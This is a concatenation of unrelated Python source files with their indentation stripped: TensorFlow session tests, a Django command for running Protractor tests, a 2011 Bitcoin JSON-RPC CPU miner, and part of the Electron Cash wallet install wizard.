# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testInferShapesTrue(self):
config_pb = config_pb2.ConfigProto(
graph_options=config_pb2.GraphOptions(infer_shapes=True))
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session(config=config_pb)
self.assertTrue('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testBuildCostModel(self):
run_options = config_pb2.RunOptions()
config_pb = config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(build_cost_model=100))
with session.Session(config=config_pb) as sess:
with ops.device('/device:GPU:0'):
a = array_ops.placeholder(dtypes.float32, shape=[])
b = math_ops.add(a, a)
c = array_ops.identity(b)
d = math_ops.multiply(c, c)
for step in xrange(120):
run_metadata = config_pb2.RunMetadata()
sess.run(
d,
feed_dict={a: 1.0},
options=run_options,
run_metadata=run_metadata)
if step == 99:
self.assertTrue(run_metadata.HasField('cost_graph'))
else:
self.assertFalse(run_metadata.HasField('cost_graph'))
def runTestOutputPartitionGraphs(self, sess):
run_options = config_pb2.RunOptions(output_partition_graphs=True)
a = constant_op.constant(1)
run_metadata = config_pb2.RunMetadata()
sess.run(a, options=run_options, run_metadata=run_metadata)
self.assertGreater(len(run_metadata.partition_graphs), 0)
sess.run(a, run_metadata=run_metadata)
self.assertEqual(len(run_metadata.partition_graphs), 0)
@test_util.run_v1_only('b/120545219')
def testOutputPartitionGraphsDirect(self):
self.runTestOutputPartitionGraphs(session.Session())
@test_util.run_v1_only('b/120545219')
def testOutputPartitionGraphsDistributed(self):
server = server_lib.Server.create_local_server()
self.runTestOutputPartitionGraphs(session.Session(server.target))
def testNonInteractiveSessionNesting(self):
sess1 = session.Session()
sess1_controller = sess1.as_default()
sess1_controller.__enter__()
sess2 = session.Session()
sess2_controller = sess2.as_default()
sess2_controller.__enter__()
with self.assertRaisesRegexp(AssertionError, 'Nesting violated'):
sess1_controller.__exit__(None, None, None)
ops._default_session_stack.reset()
def testInteractiveSessionNesting(self):
sess1 = session.InteractiveSession()
sess2 = session.InteractiveSession()
del sess1
del sess2
@test_util.run_v1_only('b/120545219')
def testAsDefault(self):
c = constant_op.constant(37)
sess = session.Session()
with sess.as_default():
self.assertEqual(37, c.eval())
# Ensure that the session remains valid even when it is not captured.
with session.Session().as_default():
self.assertEqual(37, c.eval())
def testReentry(self):
sess = session.Session()
with self.assertRaisesRegexp(RuntimeError, 'not re-entrant'):
with sess:
with sess:
pass
def testInvalidArgument(self):
with self.assertRaisesRegexp(TypeError, 'target must be a string'):
session.Session(37)
with self.assertRaisesRegexp(TypeError, 'config must be a tf.ConfigProto'):
session.Session(config=37)
with self.assertRaisesRegexp(TypeError, 'graph must be a tf.Graph'):
session.Session(graph=37)
@test_util.run_v1_only('b/120545219')
def testTimeoutWithShortOperations(self):
num_epochs = 5
q = data_flow_ops.FIFOQueue(capacity=50, dtypes=[dtypes.int32], shapes=[()])
enqueue_op = q.enqueue_many(constant_op.constant([1, 2]))
# Use a 10-second timeout, which should be longer than any
# non-blocking enqueue_many op.
config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=10000)
with session.Session(config=config_pb) as sess:
for _ in range(num_epochs):
sess.run(enqueue_op)
self.assertEqual(sess.run(q.size()), num_epochs * 2)
@test_util.run_v1_only('b/120545219')
def testRegisterFetchAndFeedConversionFunctions(self):
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = math_ops.square(tensor)
fetch_fn = lambda squared_tensor: ([squared_tensor.sq], lambda val: val[0])
feed_fn1 = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_fn2 = lambda feed: [feed.sq]
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.assertRaises(ValueError):
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.cached_session() as sess:
np1 = np.array([1.0, 1.5, 2.0, 2.5])
np2 = np.array([3.0, 3.5, 4.0, 4.5])
squared_tensor = SquaredTensor(np2)
squared_eval = sess.run(squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
squared_eval = sess.run(
squared_tensor, feed_dict={
squared_tensor: np1 * np1
})
self.assertAllClose(np1 * np1, squared_eval)
partial_run = sess.partial_run_setup([squared_tensor], [])
squared_eval = sess.partial_run(partial_run, squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
def testDefaultLogDevicePlacement(self):
class CaptureStderr(str):
"""Class to capture stderr from C++ shared library."""
def __enter__(self):
self._esc = compat.as_str('\b')
self._output = compat.as_str('')
self._stderr = sys.stderr
self._fd = self._stderr.fileno()
self._out_pipe, in_pipe = os.pipe()
# Save the original io stream.
self._dup_fd = os.dup(self._fd)
# Replace the original io stream with in pipe.
os.dup2(in_pipe, self._fd)
return self
def __exit__(self, *args):
self._stderr.write(self._esc)
self._stderr.flush()
self.read()
os.close(self._out_pipe)
# Restore the original io stream.
os.dup2(self._dup_fd, self._fd)
def read(self):
while True:
data = os.read(self._out_pipe, 1)
if not data or compat.as_str(data) == self._esc:
break
self._output += compat.as_str(data)
def __str__(self):
return self._output
if context.executing_eagerly():
context.set_log_device_placement(True)
with CaptureStderr() as log:
a = constant_op.constant(1)
b = constant_op.constant(2)
c = a + b
else:
# Passing the config to the server, but not the session should still
# result in logging device placement.
config_pb = config_pb2.ConfigProto(log_device_placement=True)
server = server_lib.Server.create_local_server(config=config_pb)
a = constant_op.constant(1)
b = constant_op.constant(2)
c = a + b
with session.Session(server.target) as sess:
with CaptureStderr() as log:
sess.run(c)
# Ensure that we did log device placement.
self.assertTrue('/replica:0/task:0/device:CPU:0' in str(log), str(log))
@test_util.run_v1_only('b/120545219')
def testLocalMasterSessionTimeout(self):
# Test that the timeout passed in a config to the session works correctly.
config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server()
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target, config=config_pb) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
@test_util.run_v1_only('b/120545219')
def testDefaultServerTimeout(self):
# Test that the default server config timeout gets used when no Session
# config is provided.
config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server(config=config_pb)
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
def runTestBuildGraphError(self, sess):
# Ensure that errors from building the graph get propagated.
data = array_ops.placeholder(dtypes.float32, shape=[])
# pylint: disable=protected-access
enter_1 = gen_control_flow_ops.enter(data, 'foo_1', False)
enter_2 = gen_control_flow_ops.enter(data, 'foo_2', False)
# pylint: enable=protected-access
res = math_ops.add(enter_1, enter_2)
with self.assertRaisesOpError('has inputs from different frames'):
sess.run(res, feed_dict={data: 1.0})
@test_util.run_v1_only('b/120545219')
def testBuildGraphErrorDirect(self):
self.runTestBuildGraphError(session.Session())
@test_util.run_v1_only('b/120545219')
def testBuildGraphErrorDist(self):
server = server_lib.Server.create_local_server()
self.runTestBuildGraphError(session.Session(server.target))
def testDeviceAttributes(self):
attrs = session._DeviceAttributes(
'/job:worker/replica:0/task:3/device:CPU:2', 'TYPE', 1337, 1000000)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:2', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
self.assertEqual(1000000, attrs.incarnation)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def testDeviceAttributesCanonicalization(self):
attrs = session._DeviceAttributes('/job:worker/replica:0/task:3/cpu:1',
'TYPE', 1337, 1000000)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:1', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
self.assertEqual(1000000, attrs.incarnation)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def runTestAddFunctionToSession(self, target=''):
"""Add a function to a session after the graph has already been run."""
@function.Defun(dtypes.float32)
def foo(x):
return x + 1
x = constant_op.constant(1.0)
with session.Session(target=target) as sess:
sess.run(x)
f = foo(x)
result = sess.run(f)
self.assertEqual(result, 2.0)
@test_util.run_v1_only('b/120545219')
def testAddFunctionToSession(self):
self.runTestAddFunctionToSession()
@test_util.run_v1_only('b/120545219')
def testAddFunctionToGrpcSession(self):
server = server_lib.Server.create_local_server()
self.runTestAddFunctionToSession(server.target)
def testOpenAndCloseGrpcSession(self):
server = server_lib.Server.create_local_server()
with session.Session(server.target):
pass
def testOpenAndCloseSession(self):
with session.Session():
pass
@test_util.run_v1_only('b/120545219')
def testAutoConvertAndCheckData(self):
with self.cached_session() as sess:
a = array_ops.placeholder(dtype=dtypes.string)
with self.assertRaisesRegexp(
TypeError, r'Type of feed value 1 with type <(\w+) \'int\'> is not'):
sess.run(a, feed_dict={a: 1})
@test_util.run_v1_only('b/120545219')
def testOptimizerOptions(self):
config.set_optimizer_experimental_options({'min_graph_nodes': -1})
with ops.Graph().as_default():
sess = session.Session()
self.assertEqual(
sess._config.graph_options.rewrite_options.min_graph_nodes, -1)
if __name__ == '__main__':
googletest.main()
|
protractor.py
|
# -*- coding: utf-8 -*-
import os
import sys
from multiprocessing import Process
from optparse import make_option
import subprocess
from django.core.management import call_command
from django.core.management.base import BaseCommand
from django.db import connection
from django.test.runner import setup_databases
class Command(BaseCommand):
args = '[--protractor-conf] [--runserver-command] [--specs] [--suite] [--addrport]'
help = 'Run protractor tests with a test database'
option_list = BaseCommand.option_list + (
make_option('--protractor-conf',
action='store',
dest='protractor_conf',
default='protractor.conf.js',
help='Specify a destination for your protractor configuration'
),
make_option('--runserver-command',
action='store',
dest='run_server_command',
default='runserver',
help='Specify which command you want to run a server'
),
make_option('--specs',
action='store',
dest='specs',
help='Specify which specs to run'
),
make_option('--suite',
action='store',
dest='suite',
help='Specify which suite to run'
),
make_option('--fixture',
action='append',
dest='fixtures',
help='Specify fixture to load initial data to the database'
),
make_option('--addrport', action='store', dest='addrport',
type='string',
help='port number or ipaddr:port to run the server on'),
)
def handle(self, *args, **options):
options['verbosity'] = int(options.get('verbosity'))
if not os.path.exists(options['protractor_conf']):
raise IOError("Could not find '{}'"
.format(options['protractor_conf']))
self.run_webdriver()
old_config = self.setup_databases(options)
fixtures = options['fixtures']
if fixtures:
call_command('loaddata', *fixtures,
**{'verbosity': options['verbosity']})
if options['addrport'] is None:
options['addrport'] = os.environ.get(
'DJANGO_LIVE_TEST_SERVER_ADDRESS', '8081')
test_server_process = Process(target=self.runserver, args=(options,))
test_server_process.daemon = True
test_server_process.start()
authority = options['addrport']
if ':' not in authority:
authority = 'localhost:' + authority
live_server_url = 'http://%s' % authority
params = {
'live_server_url': live_server_url
}
protractor_command = 'protractor {}'.format(options['protractor_conf'])
protractor_command += ' --baseUrl {}'.format(live_server_url)
if options['specs']:
protractor_command += ' --specs {}'.format(options['specs'])
if options['suite']:
protractor_command += ' --suite {}'.format(options['suite'])
for key, value in params.items():
protractor_command += ' --params.{key}={value}'.format(
key=key, value=value
)
return_code = subprocess.call(protractor_command.split())
# Terminate the live server process before tearing down the databases
# to prevent the error
# django.db.utils.OperationalError: database is being accessed by other users
test_server_process.terminate()
self.teardown_databases(old_config, options)
if return_code:
self.stdout.write('Failed')
sys.exit(1)
else:
self.stdout.write('Success')
def setup_databases(self, options):
return setup_databases(options['verbosity'], False)
def teardown_databases(self, old_config, options):
"""
Destroys all the non-mirror databases.
"""
if len(old_config) > 1:
old_names, mirrors = old_config
else:
old_names = old_config
for connection, old_name, destroy in old_names:
if destroy:
connection.creation.destroy_test_db(old_name, options['verbosity'])
def runserver(self, options):
use_threading = connection.features.test_db_allows_multiple_connections
self.stdout.write('Starting server...')
call_command(
options['run_server_command'],
addrport=options.get('addrport'),
shutdown_message='',
use_reloader=False,
use_ipv6=False,
verbosity=0,
use_threading=use_threading,
stdout=open(os.devnull, 'w')
)
def run_webdriver(self):
self.stdout.write('Starting webdriver...')
with open(os.devnull, 'w') as f:
subprocess.call(['webdriver-manager', 'update'], stdout=f, stderr=f)
subprocess.Popen(['webdriver-manager', 'start'], stdout=f, stderr=f)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 6888
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
installwizard.py
|
# -*- mode: python3 -*-
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electroncash import Wallet, WalletStorage
from electroncash.util import UserCancelled, InvalidPassword, finalization_print_error
from electroncash.base_wizard import BaseWizard
from electroncash.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PW_NEW
from .bip38_importer import Bip38Importer
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Electron Cash is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Bitcoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #{}:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electron Cash - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electron.svg')
self.show()
self.raise_()
# Track object lifecycle
finalization_print_error(self)
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electron Cash wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except IOError:
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = _("This file is encrypted.") + '\n' + _('Enter your password or choose another file.')
pw = True
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
password = None
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.hide()
msg = _("The format of your wallet '%s' must be upgraded for Electron Cash. This change will not be backward compatible"%path)
if not self.question(msg):
return
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet, password
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet, password
self.wallet = Wallet(self.storage)
return self.wallet, password
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QIcon(filename).pixmap(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
def bip38_prompt_for_pw(self, bip38_keys):
''' Reimplemented from basewizard superclass. Expected to return the pw
dict or None. '''
d = Bip38Importer(bip38_keys, parent=self.top_level_window())
res = d.exec_()
d.setParent(None) # python GC quicker if this happens
return d.decoded_keys # dict will be empty if user cancelled
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password. Note that this dialog screen
cannot go back, and instead the user can only cancel."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def _add_extra_button_to_layout(self, extra_button, layout):
if (not isinstance(extra_button, (list, tuple))
or not len(extra_button) == 2):
return
but_title, but_action = extra_button
hbox = QHBoxLayout()
hbox.setContentsMargins(12,24,12,12)
but = QPushButton(but_title)
hbox.addStretch(1)
hbox.addWidget(but)
layout.addLayout(hbox)
but.clicked.connect(but_action)
@wizard_dialog
